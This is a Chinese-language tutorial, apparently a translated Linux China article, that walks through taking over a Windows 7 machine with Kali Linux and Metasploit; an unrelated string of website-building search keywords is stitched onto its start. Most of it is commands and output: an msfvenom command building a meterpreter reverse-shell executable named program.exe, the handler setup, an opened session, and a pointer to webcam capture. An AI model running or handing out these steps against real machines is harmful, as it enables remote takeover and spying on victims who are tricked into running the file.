传奇服务器如何做网站,企业做网站大概需要多少钱,建设网站技术数据策划书,网站 分站Kali Linux 派生自 Debian Linux#xff0c;主要用于渗透测试#xff0c;拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台#xff0c;Metasploit 是一个用于开发和执行安全利用代码(security exploit)的工具。让我们来使用…Kali Linux 派生自 Debian Linux主要用于渗透测试拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台Metasploit 是一个用于开发和执行安全利用代码(security exploit)的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意我写这篇文章只是出于教育目的哦——一切因此带来的后果和本文作者、译者无关。源机器详情Kali Linuxrootkali:/# uname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linuxrootkali:/#用做攻击对象的目标机器Windows 7 Ultimate SP1步骤 1创建 Payload 程序Payload 是一个类似于病毒或者木马的程序可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload(program.exe)以便能使用 Kali Linux 黑掉 Windows。rootkali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.189.128 LPORT4444 --formatexe -o /root/program.exeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 333 bytesFinal size of exe file: 73802 bytesSaved as: /root/program.exerootkali:/# ls -la /root/program.exe-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe通过 ls 命令我们可以确认 Payload 程序是否成功生成在指定的位置。步骤 2运行 mfsconsole 命令启动 msf 命令窗口rootkali:# msfconsole.,,. ..\$$$$$L..,,aaccaacc%#s$b. d8, d8Pd8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. BP d888888pd888888P 7$$$$\^^ .7$$$|D* ?88d8bd8b.d8p d8888b ?88 d888b8b _.os#$|8* d8P ?8b 88P88P?P?P d8b_,dP 88P d8P ?88 .oaS###S* d8P d8888b $whi?88b 88bd88 d8 ?8 88b 88b 88b ,88b .osS$$$$* ?88,.d88b, d88 d8P ?88 88P ?8bd88 d88b 8b?8888P?8b?88P.aS$$$$Q* ?88 ?88 ?88 88b d88 d88.a#$$$$$$ 88b d8P 88b?8888P,s$$$$$$$ 888888P 88n _.,,,ass;:.a$$$$$$$P d88P .,.ass%#S$$$$$$$$$$$$$$.a$###$$$P _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$,a$$###$$P _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##--^^/$$$$$$_______________________________________________________________ ,$$$$$$_____ll$$$$.;;lll...;;lllll......;;;llll;;;.... ......;;;;... . .Taking notes in notepad? Have Metasploit Pro track reportyour progress and findings -- learn more on http://rapid7.com/metasploit[ metasploit v4.12.22-dev ] -- --[ 1577 exploits - 906 auxiliary - 272 post ] -- --[ 455 payloads - 39 encoders - 8 nops ] -- --[ Free Metasploit Pro trial: http://r-7.co/trymsp ]msf 步骤 3进行漏洞利用的细节4444 端口你可以按照自己的想法来选择使用哪个端口LHOST IP表示 Kali Linux 机器的 IP这里是 192.168.189.128。 使用如下命令来查看你的 Kali Linux 机器的 IP。rootkali:/# ip r l192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100rootkali:/#现在在 msf 命令窗口使用 use exploit/multi/handler 命令如下msf use exploit/multi/handlermsf exploit(handler) 然后在接下来的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcpmsf exploit(handler) set payload windows/meterpreter/reverse_tcppayload windows/meterpreter/reverse_tcp现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口如下msf exploit(handler) set lhost 192.168.189.128lhost 192.168.189.128msf exploit(handler) set lport 4444lport 4444最后使用 exploit 命令。msf exploit(handler) exploit[*] Started reverse TCP handler on 192.168.189.128:4444[*] Starting the payload handler...现在你需要在 Windows 上运行 program.exe一旦它在目标机器上执行你就可以建立一个 meterpreter 会话。输入 sysinfo 就可以得到这台被黑掉的 Windows 机器的详情。msf exploit(handler) exploit[*] Started reverse TCP handler on 192.168.189.128:4444[*] Starting the payload handler...[*] Sending stage (957999 bytes) to 192.168.189.1[*] Meterpreter session 1 opened (192.168.189.128:4444 - 192.168.189.1:53091) at 2017-01-26 00:51:31 0000meterpreter sysinfoComputer : MANN-PCOS : Windows 7 (Build 7601, Service Pack 1).Architecture : x64 (Current Process is WOW64)System Language : en_INDomain : WORKGROUPLogged On Users : 2Meterpreter : x86/win32一旦你得到了这些详细信息就可以做更多的漏洞利用或者通过 help 命令获取更多信息以便列出你可以黑掉该系统的所有选项比如 webcam_snap 命令获取网络摄像头同样你还可以使用其他更多的可用选项。祝你入侵愉快 ←_←作者简介嗨我是 Manmohan Mirkar。很高兴认识你。我接触 Linux 是在十年前我做梦也没想到我有现在这样的收获。我的愿望就是让你学到 Linux 的知识谢谢你的阅读。译者简介GHLandy —— 划不完粉腮柳眉泣别离。本文由 LCTT 原创编译Linux中国 荣誉推出
